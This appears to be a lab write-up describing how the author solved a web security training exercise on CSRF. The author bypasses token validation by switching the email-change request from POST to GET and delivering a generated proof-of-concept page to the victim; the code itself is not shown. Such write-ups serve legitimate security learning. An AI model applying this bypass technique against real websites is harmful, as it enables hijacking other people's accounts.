This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.
To solve the lab, use your exploit server to host an HTML page that uses a to change the viewer's email address.
You can log in to your own account using the following credentials: wiener:peter
After logging in with the provided credentials, I intercepted the change email request and sent it to repeater:
I noticed that there is a CSRF token included in the request to protect against CSRF attacks. Initially, I tried creating a CSRF PoC and sending it to the victim, but it didn't work. Given the lab title, which hinted that token validation might depend on the request method, I decided to change the POST request to a GET request. Then, I generated a new CSRF PoC and sent it to the victim.
Here is the modified GET request:
By right-clicking the request and selecting Engagement tools / Generate CSRF PoC, I generated the following HTML:
I modified the email value to a new one to avoid any errors related to reused email addresses. After copying the CSRF PoC, I placed it in my malicious page on the exploit server.
By clicking Store and Deliver exploit to victim, I saw that the lab was solved, confirming the change of the victim's email.